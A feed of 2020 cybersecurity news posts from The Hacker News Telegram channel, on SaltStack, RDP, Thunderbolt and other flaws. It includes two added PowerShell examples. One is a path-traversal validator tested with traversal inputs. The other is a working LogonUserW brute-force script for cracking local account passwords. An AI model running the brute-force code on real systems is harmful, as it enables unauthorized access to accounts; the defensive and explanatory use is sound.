The Hacker News
Official THN Telegram Channel — A trusted, widely read, independent source for breaking news and tech coverage about cybersecurity and hacking.

📨 Contact: admin@thehackernews.com

🌐 Website: https://thehackernews.com
During the COVID-19 pandemic, when many organizations and universities are embracing online learning, researchers have discovered multiple critical vulnerabilities in three widely used Learning Management System (LMS) plugins for #WordPress sites.

Read more — https://thehackernews.com/2020/04/wordpress-lms-plugins.html
EventBot — A new Android malware spotted in the wild steals infected users' BANKING passwords, exfiltrates private DATA, and captures KEYSTROKES to spy on accounts and the content of other apps installed on the targeted devices.

Read: https://thehackernews.com/2020/04/android-banking-keylogger.html
🔥 WARNING — Here’s a new CVSS 10 Bug.

A newly disclosed critical SaltStack RCE (as root) vulnerability (CVE-2020-11651) affects thousands of servers (roughly 6,000) deployed in data centers and cloud environments.

Read details — https://thehackernews.com/2020/05/saltstack-rce-vulnerability.html
WARNING — Within a day of the public disclosure of the SaltStack RCE vulnerability (CVE-2020-11651), hackers have started exploiting unpatched servers.

LineageOS [hacked]
Ghost CMS [hacked]
DigiCert [hacked]

Read more: https://thehackernews.com/2020/05/saltstack-rce-exploit.html
Now this 👇 is Interesting!

A researcher demonstrated malware that exfiltrates data from air-gapped (and even audio-gapped, speaker-less) devices such as PCs, servers, IoT and embedded devices by turning their power supplies into out-of-band speakers.

Read details + watch demo ➤
https://thehackernews.com/2020/05/air-gap-malware-power-speaker.html
Attention Xiaomi Users!

You should immediately change the newly introduced PRIVACY setting in your Mi/Mi Pro and Mint browsers to prevent the company from collecting your web history and online activity when browsing in INCOGNITO mode.

Read details:
https://thehackernews.com/2020/05/xiaomi-browser-history.html
{new} 🔥 Watch Out Enterprises!

The Citrix ShareFile platform contains critical vulnerabilities that could let unauthenticated attackers steal proprietary, sensitive business data from on-premises storage zone controllers.

Details — https://thehackernews.com/2020/05/citrix-sharefile-vulnerability.html
Facebook launches 'Discover,' yet another free Internet service, in partnership with mobile carriers across the world.

Unlike previous projects, Discover:

Treats all websites equally,
Accesses sites through a secure web proxy,
Lets users browse text-based sites.

Read details:
https://thehackernews.com/2020/05/facebook-discover-free-internet.html
A Chinese APT group has recently been spotted targeting government entities in the Asia-Pacific region as part of a stealthy cyber-espionage campaign that had gone undetected for the last five years.

Read details ➤ https://thehackernews.com/2020/05/asia-pacific-cyber-espionage.html
DigitalOcean — one of the largest modern web hosting companies — recently suffered a data leak incident that exposed some of its customers' data to unauthorized third parties; the exposed data was accessed at least 15 times.

Read more: https://thehackernews.com/2020/05/digitalocean-data-breach.html
ThunderSpy 🕵️‍♂️

Seven new, unpatchable hardware vulnerabilities affect all Thunderbolt-equipped computers sold in the last nine years, letting attackers with brief physical access ('evil maid' scenarios) steal data from encrypted systems, even when they are locked or in sleep mode.

Read: https://thehackernews.com/2020/05/thunderbolt-vulnerabilities.html
Watch Out !!!

If you are running a vBulletin forum website, make sure to install the newly issued security patch that fixes a critical vulnerability (CVE-2020-12720) in the popular forum software; details of the flaw have not been disclosed.

Read here: https://thehackernews.com/2020/05/vBulletin-access-vulnerability.html
Over 4,000 Android apps are unknowingly leaking sensitive information about their millions of users through misconfigured (publicly accessible) Google-hosted Firebase databases, a recent assessment of just 15,000 apps revealed.

Read details: https://thehackernews.com/2020/05/android-firebase-database-security.html
On the third anniversary of the global WannaCry ransomware outbreak, the U.S. Department of Defense, the FBI and CISA released a joint report exposing three new, sophisticated malware families that North Korean state-sponsored hackers are using against their targets.

Read more: https://thehackernews.com/2020/05/fbi-north-korean-malware.html
A researcher at ESET has spotted a new piece of malware that he says is tailored for attacking computers inside "air-gapped networks."

Read more about 'Ramsay malware' —
https://thehackernews.com/2020/05/airgap-network-malware.html
Remember the Reverse RDP Attacks?

A path traversal vulnerability in the Windows RDP client could let a malicious server compromise, in reverse, any client system that connects to it.

Microsoft patched it in July 2019; that patch was bypassed and re-patched in February 2020, and the new fix is apparently still incomplete, leaving dozens of third-party RDP clients that rely on the same Microsoft API function vulnerable.

https://thehackernews.com/2020/05/reverse-rdp-attack-patch.html
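The check a client needs when the remote side supplies a file name, as an added PowerShell example that is not the page's code, Microsoft's fix, or any RDP client's own code. It treats both "/" and "\" as separators before canonicalizing, because Windows file APIs accept either, then confirms the resolved path still sits under the directory the client chose. The base directory and the three server-supplied names are constructed for illustration.

```powershell
function Test-SafeClientPath {
    param(
        [Parameter(Mandatory)][string]$BaseDir,        # directory the client is willing to write into
        [Parameter(Mandatory)][string]$ServerSupplied  # file name or fragment received from the remote side
    )
    # Canonicalize the base once and keep a trailing separator, so that
    # "C:\Data\a" is not accepted as a prefix of "C:\Data\ab".
    $base = [System.IO.Path]::GetFullPath($BaseDir).TrimEnd('\') + '\'

    # Treat forward slashes as separators before canonicalizing. A check that
    # only recognizes "\" rejects "..\" but lets "../" through, and the file
    # API honours both.
    $normalized = $ServerSupplied.Replace('/', '\')

    # Combine returns an absolute or UNC second argument unchanged, and
    # GetFullPath collapses "." and ".." segments, so anything that escapes
    # $BaseDir ends up with a different prefix.
    $candidate = [System.IO.Path]::GetFullPath([System.IO.Path]::Combine($base, $normalized))

    return $candidate.StartsWith($base, [System.StringComparison]::OrdinalIgnoreCase)
}

# Constructed inputs (assumption: the client stores received files under C:\Users\victim\Downloads).
$downloads = 'C:\Users\victim\Downloads'
Test-SafeClientPath -BaseDir $downloads -ServerSupplied '..\..\..\Windows\evil.exe'
Test-SafeClientPath -BaseDir $downloads -ServerSupplied '../../../Windows/evil.exe'
Test-SafeClientPath -BaseDir $downloads -ServerSupplied 'report.txt'
```

Run on Windows, the first two calls must come back $false and only the last $true; a client that writes the file without a check of this shape is exactly the kind of third-party RDP client the post describes.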
A new variant of the COMpfun cyber-espionage malware uses the HTTP status codes returned by its command-and-control server as instructions for what to do on the hacked computers, which belong to diplomatic entities in Europe.

Read more: https://thehackernews.com/2020/05/malware-http-codes.html
This is interesting...

Even a guest account on Windows can brute-force the password of any local account, including the administrator, through the LogonUserW API, because the API imposes no limit on login attempts.

Here's a PoC tool: https://github.com/DarkCoderSc/win-brute-logon
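The technique described above, as an added PowerShell example that is not the page's code and not the win-brute-logon tool: it declares LogonUserW through P/Invoke and walks a constructed wordlist against one local account. The account name 'labuser' and the candidate passwords are made up for illustration; run it only against a throwaway account on a lab machine you own.

```powershell
# Added example (not the win-brute-logon tool): password guessing against a
# local account via LogonUserW. LOGON32_LOGON_NETWORK needs no special
# privilege, which is why a low-privileged caller can do this at all.
$signature = @'
[DllImport("advapi32.dll", SetLastError = true, CharSet = CharSet.Unicode)]
public static extern bool LogonUserW(
    string lpszUsername, string lpszDomain, string lpszPassword,
    int dwLogonType, int dwLogonProvider, out IntPtr phToken);

[DllImport("kernel32.dll", SetLastError = true)]
public static extern bool CloseHandle(IntPtr hObject);
'@
$Win32 = Add-Type -MemberDefinition $signature -Name 'Logon' -Namespace 'LabCheck' -PassThru

function Test-LocalPassword {
    param(
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string]$Password
    )
    $LOGON32_LOGON_NETWORK    = 3   # validate credentials without creating a session
    $LOGON32_PROVIDER_DEFAULT = 0
    $token = [IntPtr]::Zero
    # "." selects the local SAM database rather than a domain.
    $ok = $Win32::LogonUserW($UserName, '.', $Password,
                             $LOGON32_LOGON_NETWORK, $LOGON32_PROVIDER_DEFAULT, [ref]$token)
    if ($ok) { [void]$Win32::CloseHandle($token) }   # a successful call hands back a real token
    return $ok
}

function Find-LocalPassword {
    param(
        [Parameter(Mandatory)][string]$UserName,
        [Parameter(Mandatory)][string[]]$Candidates
    )
    $attempts = 0
    foreach ($candidate in $Candidates) {
        $attempts++
        if (Test-LocalPassword -UserName $UserName -Password $candidate) {
            return [pscustomobject]@{ UserName = $UserName; Password = $candidate; Attempts = $attempts }
        }
    }
    return $null   # nothing in the wordlist matched
}

# Constructed wordlist for the demonstration; a real run would read one from disk.
$wordlist = @('Password1', 'Welcome123', 'Summer2020!', 'LabOnly-ChangeMe')
Find-LocalPassword -UserName 'labuser' -Candidates $wordlist
```

Two caveats for anyone reproducing this: the API itself applies no rate limiting, but whether the target account locks out still depends on the machine's local lockout policy, and with logon failure auditing enabled every failed call shows up in the Security log as Event ID 4625, which is what a defender should be alerting on.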
A New Impersonation Vulnerability in Bluetooth Exposes Over A Billion Modern Devices to Hackers

Read details: https://thehackernews.com/2020/05/hacking-bluetooth-vulnerability.html